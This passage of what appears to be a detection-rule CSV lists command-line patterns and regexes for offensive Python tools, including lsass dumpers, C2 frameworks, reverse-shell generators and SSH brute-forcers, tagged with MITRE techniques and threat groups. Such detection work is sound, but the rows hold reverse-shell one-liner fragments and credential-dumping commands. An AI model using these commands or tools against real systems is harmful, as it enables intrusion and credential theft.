APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","56084"
"*python shock.py -o knwondlls*",".{0,1000}python\sshock\.py\s\-o\sknwondlls.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56085"
"*python st.py*",".{0,1000}python\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56086"
"*python tinar.py*",".{0,1000}python\stinar\.py.{0,1000}","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","N/A","9","10","64","17","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z","56087"
"*python* -c 'import os,pty,socket*socket.socket()*s.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\sos,pty,socket.{0,1000}socket\.socket\(\).{0,1000}s\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56088"
"*python* -c 'import socket,subprocess,os;*socket.socket(socket.AF_INET,socket.SOCK_STREAM)*.connect(*",".{0,1000}python.{0,1000}\s\-c\s\'import\ssocket,subprocess,os\;.{0,1000}socket\.socket\(socket\.AF_INET,socket\.SOCK_STREAM\).{0,1000}\.connect\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56089"
"*python* pachine.py*",".{0,1000}python.{0,1000}\spachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","56090"
"*python*charlotte.py*",".{0,1000}python.{0,1000}charlotte\.py.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","56091"
"*python*http://*:6970/ConfigFileCacheList.txt*",".{0,1000}python.{0,1000}http\:\/\/.{0,1000}\:6970\/ConfigFileCacheList\.txt.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","56092"
"*python*'http://*SEP*:6970/*.cnf.xml*",".{0,1000}python.{0,1000}\'http\:\/\/.{0,1000}SEP.{0,1000}\:6970\/.{0,1000}\.cnf\.xml.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","56093"
"*python*https://*:8443/cucm-uds/users?name=*",".{0,1000}python.{0,1000}https\:\/\/.{0,1000}\:8443\/cucm\-uds\/users\?name\=.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","56094"
"*python.exe* create_dump.py *",".{0,1000}python\.exe.{0,1000}\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56095"
"*python_modules/keyboard.zip*",".{0,1000}python_modules\/keyboard\.zip.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","56097"
"*python2??/generator.py*",".{0,1000}python2\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56098"
"*python2??/PyLoader.py*",".{0,1000}python2\?\?\/PyLoader\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56099"
"*python3 ./exp.py --url http://*",".{0,1000}python3\s\.\/exp\.py\s\-\-url\shttp\:\/\/.{0,1000}","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/craig/SpringCore0day","1","0","#linux","N/A","N/A","4","394","194","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z","56100"
"*python3 cnc.py*",".{0,1000}python3\scnc\.py.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","56101"
"*python3 create_dump.py *",".{0,1000}python3\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56102"
"*python3 dump-restore.py*",".{0,1000}python3\sdump\-restore\.py.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","56103"
"*python3 fee.py*",".{0,1000}python3\sfee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","56104"
"*python3 gcr.py*",".{0,1000}python3\sgcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","N/A","10","10","215","41","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z","56105"
"*python3 GetHash.py NtCreateFile*",".{0,1000}python3\sGetHash\.py\sNtCreateFile.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","56106"
"*python3 -m http.server 80 > .server 2> /dev/null*",".{0,1000}python3\s\-m\shttp\.server\s80\s\>\s\.server\s2\>\s\/dev\/null.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","56107"
"*python3 -m orbitaldump *",".{0,1000}python3\s\-m\sorbitaldump\s.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","56109"
"*python3 -m pwncat -lp*",".{0,1000}python3\s\-m\spwncat\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56110"
"*python3 -m pwncat -m windows -lp*",".{0,1000}python3\s\-m\spwncat\s\-m\swindows\s\-lp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","56111"
"*python3 -m S3Scanner*",".{0,1000}python3\s\-m\sS3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","56112"
"*python3 Ninja.py*",".{0,1000}python3\sNinja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","56113"
"*python3 ntlmv1.py *",".{0,1000}python3\sntlmv1\.py\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","56114"
"*python3 pacu.py*",".{0,1000}python3\spacu\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","56115"
"*python3 rsf.py*",".{0,1000}python3\srsf\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","56116"
"*python3 scshell*",".{0,1000}python3\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","56117"
"*python3 sitadel*",".{0,1000}python3\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","56118"
"*python3 slaver.py *",".{0,1000}python3\sslaver\.py\s.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","56119"
"*python3 slip.py*",".{0,1000}python3\sslip\.py.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","N/A","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","56120"
"*python3 st client wss://*",".{0,1000}python3\sst\sclient\swss\:\/\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56121"
"*python3 st.py*",".{0,1000}python3\sst\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","56122"
"*python3 start_campaign.py*","python3\sstart_campaign\.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","56123"
"*python3 TokenFinder*",".{0,1000}python3\sTokenFinder.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","0","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","56124"
"*python3*.exe .\nxc*",".{0,1000}python3.{0,1000}\.exe\s\.\\nxc.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","56125"
"*python3.exe* create_dump.py *",".{0,1000}python3\.exe.{0,1000}\screate_dump\.py\s.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","56126"
"*python3??/generator.py*",".{0,1000}python3\?\?\/generator\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","N/A","10","10","829","141","2025-04-02T09:37:10Z","2020-08-17T21:33:06Z","56127"
